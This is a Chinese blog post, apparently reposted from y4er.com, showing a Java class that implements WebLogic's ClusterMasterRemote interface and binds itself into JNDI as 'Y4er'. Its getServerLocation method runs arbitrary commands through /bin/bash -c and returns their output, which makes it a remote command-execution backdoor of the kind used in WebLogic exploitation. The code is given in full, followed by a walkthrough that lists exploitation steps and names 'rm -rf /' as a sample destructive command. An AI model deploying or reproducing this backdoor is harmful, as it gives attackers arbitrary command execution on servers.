自定义一个RMI接口类

最新推荐文章于 2025-06-13 15:06:56 发布
最新推荐文章于 2025-06-13 15:06:56 发布
阅读量400 收藏 10
点赞数 4
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85480529/article/details/143735842
版权

通过字节码来自定义一个RMI接口类,在类实现的方法中返回命令执行的结果。

注意我们要找的是interface,并且我们要返回命令执行的结果,所以方法的返回类型应该为String,并且方法必须抛出 java.rmi.RemoteException 异常。
这里选择weblogic.cluster.singleton.ClusterMasterRemote接口。

public class RemoteImpl implements ClusterMasterRemote {

    public static void main(String[] args) {
        RemoteImpl remote = new RemoteImpl();
        try {
            Context context = new InitialContext();
            context.rebind("Y4er",remote);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }


    @Override
    public void setServerLocation(String cmd, String args) throws RemoteException {

    }


    @Override
    public String getServerLocation(String cmd) throws RemoteException {
        try {

            List<String> cmds = new ArrayList<String>();

            cmds.add("/bin/bash");
            cmds.add("-c");
            cmds.add(cmd);

            ProcessBuilder processBuilder = new ProcessBuilder(cmds);
            processBuilder.redirectErrorStream(true);
            Process proc = processBuilder.start();

            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();

            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }

            return sb.toString();
        } catch (Exception e) {
            return e.getMessage();
        }
    }
}

这段代码实现了一个远程调用对象 RemoteImpl,它可能会被注册到JNDI(Java Naming and Directory Interface)中,并用于远程方法调用。这个类实现了接口 ClusterMasterRemote,并提供了远程调用的方法,尤其是getServerLocation方法中直接执行传入的Shell命令。因此,这个类存在潜在的**远程命令执行(RCE)**漏洞。

以下是详细解析:

1. 类结构概览

public class RemoteImpl implements ClusterMasterRemote
  • 该类实现了 ClusterMasterRemote 接口,因此需要定义接口中声明的方法。
  • 它包含两个方法:setServerLocationgetServerLocation

2. main 方法

public static void main(String[] args) {
    RemoteImpl remote = new RemoteImpl();
    try {
        Context context = new InitialContext();
        context.rebind("Y4er", remote);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
  • 这个 main 方法的功能是将 RemoteImpl 对象绑定到 JNDI 注册表中,使用名称 "Y4er"
  • 通过 context.rebind() 方法,将这个对象暴露出来,使其他客户端可以通过 JNDI 查找到这个对象并调用其方法。
  • 潜在风险:如果JNDI注册表是开放的,攻击者可以通过JNDI查找并远程调用这个对象的方法。

3. setServerLocation 方法

@Override
public void setServerLocation(String cmd, String args) throws RemoteException {
}
  • 这个方法被定义为空,没有实际功能。
  • 但由于该方法是接口的一部分,因此必须进行实现。

4. getServerLocation 方法

@Override
public String getServerLocation(String cmd) throws RemoteException {
    try {
        List<String> cmds = new ArrayList<>();
        cmds.add("/bin/bash");
        cmds.add("-c");
        cmds.add(cmd);

        ProcessBuilder processBuilder = new ProcessBuilder(cmds);
        processBuilder.redirectErrorStream(true);
        Process proc = processBuilder.start();

        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();

        String line;
        while ((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        return sb.toString();
    } catch (Exception e) {
        return e.getMessage();
    }
}
功能解析
  • 接收输入命令并执行
    • 方法 getServerLocation(String cmd) 接受一个命令字符串 cmd 作为输入。
    • 使用 ProcessBuilder 直接构建并执行该命令,/bin/bash -c 允许在 Bash shell 中执行传入的命令。
  • 获取执行结果
    • redirectErrorStream(true) 将标准错误流合并到标准输出流,以确保捕获所有输出。
    • 通过 BufferedReader 读取命令执行后的输出,并将其返回。
  • 异常处理
    • 如果命令执行出错,捕获异常并返回异常信息。
潜在安全风险
  • 由于 getServerLocation 方法直接接受用户输入并在 Bash shell 中执行,这就意味着存在远程代码执行(RCE)漏洞
  • 如果攻击者能够通过 JNDI 查找到并调用 getServerLocation 方法,那么攻击者可以传入任意命令,并在服务器上执行。例如,传入命令 rm -rf / 可能会删除整个服务器文件系统。

如何利用漏洞

  1. 攻击者通过 JNDI 查找注册的 "Y4er" 对象。
  2. 使用远程方法调用 (getServerLocation) 传递恶意命令。
  3. 服务器上将会执行攻击者传入的命令,并返回执行结果。

来源:https://y4er.com/posts/weblogic-uses-classloader-and-rmi-to-display-command-execution-results/

2401_85480529
关注
C++:如何正确的定义一个接口类
斧冰
03-22 1355
C++中如何定义接口类? 首先给接口类下了定义:接口类应该是只提供方法声明,而自身不提供方法定义的抽象类。接口类自身不能实例化,接口类的方法定义/实现只能由接口类的子类来完成。 而对于C++,其接口类一般具有以下特征: 1.最好不要有成员变量,但可以有静态常量(static const或enum) 2.要有纯虚接口方法 3.要有虚析构函数,并提供默认实现 4.不要声明构造函数 如下就是一个最简单的...
Java 远程调用接口(RMI)
goTsHgo的博客
09-09 1211
Java 的是一种允许 Java 程序调用远程对象的方法。这种方法类似于本地调用,但目标对象实际位于远程 JVM(Java 虚拟机)中。RMI 实现了分布式计算,允许对象跨网络进行交互,核心目的是简化跨网络的对象通信。问题:Java RMI 常见问题与挑战网络通信复杂性:问题:RMI 依赖网络连接,如果网络不稳定或者服务器不可用,会导致远程调用失败。共性规律:任何涉及远程通信的技术都会面临类似的问题,如延迟、连接超时、网络中断等。对象序列化问题:问题:RMI 传递的对象必须实现接口。
【分布式-2】自定义RPC框架
growing_duck的博客
03-13 442
使用Netty自定义RPC框架
java rmi服务_Java RMI服务搭建
weixin_29467909的博客
02-16 1074
什么是RMIRMI:远程方法调用(Remote Method Invocation)。如何建立RMI服务?建立服务端:Eclips新建Java Project,自定义名称,例如笔者项目名称:rmi-server。第1步. 首先建立两个基本的请求对象与响应对象,分别为:BaseIn.java和BaseOut.java。BaseIn.javapackage api;import java.io.Se...
RMI实现RPC
刘伟佳的博客
02-03 313
目录一、RMI简介二、执行流程三、API介绍四、代码实现1. 服务端(提供服务)2. 客户端(使用服务) 一、RMI简介 RMI(Remote Method Invocation) 远程方法调用。 RMI是从JDK1.2推出的功能,它可以实现在一个Java应用中可以像调用本地方法一样调用另一个服务器中Java应用(JVM)中的内容。 RMIJava语言的远程调用,无法实现跨语言。 二、执行流程 Registry(注册表)是放置所有服务器对象的命名空间。 每次服务端创建一个对象时,它都会使用bi
自定义 RPC框架2——RMI实现RPC
想飞的鱼的博客
04-16 610
RMI简介 **RMI(Remote Method Invocation)**远程方法调用 RMI是从JDK1.2推出的功能,它可以实现在一个JAVA应用中可以像调用本地方法一样调用另一个服务中Java应用(JVM)中的内容。 RMIJava语言的远程调用,无法实现跨语言 执行流程 **Registry(注册表)**是放置所有服务器对象的命名空间。每次服务端创建一个对象时,他都会使用bind()或者rebind()方法注册该对象。这些是使用称为绑定名称的唯一名称注册的。 要调用远程对象,客户端需要该对象
RPC RMI 区别以及在java中的应用
qq_42320804的博客
06-09 1419
RPC RMI 区别以及在java中的应用
Java自定义异常类的最佳实践
ElvaRaleign的博客
04-25 441
如果在构造函数中抛出异常,那么任何尝试创建该异常对象的代码都可能失败,从而导致程序崩溃或更复杂的错误处理逻辑。相反,我们应该在需要抛出异常的地方直接抛出异常,而不是在构造函数中。然而,在某些情况下,内置异常类可能无法满足我们的需求,这时就需要创建自定义异常类来更好地表示和处理错误。可以使用父类中的构造函数来初始化异常消息,或者添加自定义的字段和方法来存储更多关于异常的信息。通过明确异常的含义,我们可以确保在适当的时候抛出和捕获这些异常,从而更有效地处理错误。如果异常是严重的、不可恢复的,应该继承自。
Java RMI和Spring RMI的实现
ibigboy
12-17 2886
初学RMI时,在网上搜java RMI的使用方法,很容易就搜到了,也很简单,整个过程也就是以下几个步骤: Java RMI的简单实现案例 1、创建自定义服务接口并继承java.rmi.Remote接口 package cn.com.rimtest; import java.rmi.Remote; import java.rmi.RemoteException; public interfa...
spring RMI 远程接口调用
08-25
Spring RMI(Remote Method Invocation)远程接口调用是Spring框架提供的一个特性,它允许你在分布式环境中调用对象的方法,使得应用程序能够跨越网络边界操作远程对象。这个技术在大型企业级应用中尤其有用,因为它...
springRMI接口实现
07-02
2. **服务实现**:接着,你需要创建这个接口的实现类,并标注`@Remote`注解来表明它是一个远程服务。这个实现类将实际执行服务逻辑。 ```java @Remote public class MyRemoteServiceImpl implements ...
rmi远程接口调用
11-12
3. **注册远程对象(Registering the Remote Object)**:在服务端,使用`java.rmi.registry.Registry`接口的`bind`方法将远程对象与一个名字绑定,这样客户端可以通过这个名字查找对象。 4. **启动RMIServer**:...
spring rmi 多接口配置 调用
08-12
1. **定义RMI接口**:创建一个或多个接口,这些接口将暴露给客户端调用。例如,`IRemoteService.java`: ```java public interface IRemoteService { String doSomething(String input); int performOperation...
RMI.rar_rmi
09-19
"ch11"可能是指该压缩包中的第11章内容,通常在教程或书籍中,这一章节可能详细介绍了如何创建和运行一个简单的RMI应用,包括设置环境、编写远程接口和实现、注册远程对象、编写客户端代码等步骤。通过实践这个例子...
Java循环编程常见错误与优化实践
静水深流
06-10 463
值得注意的是,基础的静态分析诊断(如"变量未使用")无法检测此类问题,因为循环变量。该实现完全封装了索引操作,消除了客户端代码中显式使用索引的风险。建议在代码审查时特别关注循环体内索引变量的使用一致性,并针对边界情况(如空数组、单元素数组、多元素同值数组)设计专项测试用例。),将导致严重的无限循环问题。在需要逆向遍历集合时,开发者常犯的关键错误是修改循环条件后忘记调整递增/递减操作。开发者在循环结构中常犯的一个典型错误是:虽然正确编写了循环结构,但在循环体内错误地使用常量索引(如。停止更新,引发无限循环。
Models->Chat Models->OpenAI Chat
xiatiaohcx的专栏
06-10 705
Spring AI支持来自OpenAI的各种AI语言模型,OpenAI是ChatGPT背后的公司,由于其创建了行业领先的文本生成模型和嵌入,它在激发人们对AI驱动的文本生成的兴趣方面发挥了重要作用。
SpringCloud-sentinel集成到nacos
最新发布
a_15715324986的博客
06-13 332
这是因为,流控规则是保存在内存中的,如果重启微服务,内存中的规则就消失了。前面我们学习sentinel熔断和降级时,如果服务器重启,那么配置的规则都会消失。大家记得命名空间是区分服务和properties配置的范围,一定要一一对应,比如dev、prod、test,都要保持跟项目启动配置一致。但是当我们重启下微服务,再次频繁刷新时,就会发现没有报错,说明规则失效了。如上创建配置,记得这是在dev下创建配置的,跟yml中的命名空间需要一致。如上图所示,重启服务后,规则还是生效的,这样就做到了持久化。
使用java实现蒙特卡洛模拟风险预测功能
洒家
06-10 1020
巧合下看到了蒙特卡洛模拟风险预测,比较感兴趣,而网上基本上是基于Python处理,没有如何使用java来实现一个实际功能,所以有个基于java去实现实际功能的这样一个想法,这里使用SpringBoot + Vue3来实现这个功能。
6.13Java错题
m0_61261153的博客
06-13 176
答案选ABC。- A选项: throws 关键字在方法声明时使用,用于告知调用者该方法可能会抛出哪些异常类型,方便调用者进行异常处理,A选项正确。- B选项: throw 关键字用于在程序执行过程中,当满足特定条件时,手动创建并抛出一个异常对象,来表示程序出现了异常情况,B选项正确。- C选项:当 throw 抛出异常对象后,当前方法的后续代码不再执行,程序会跳转到调用该方法的地方,并将异常对象传递给调用者,由调用者进行处理,C选项正确。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值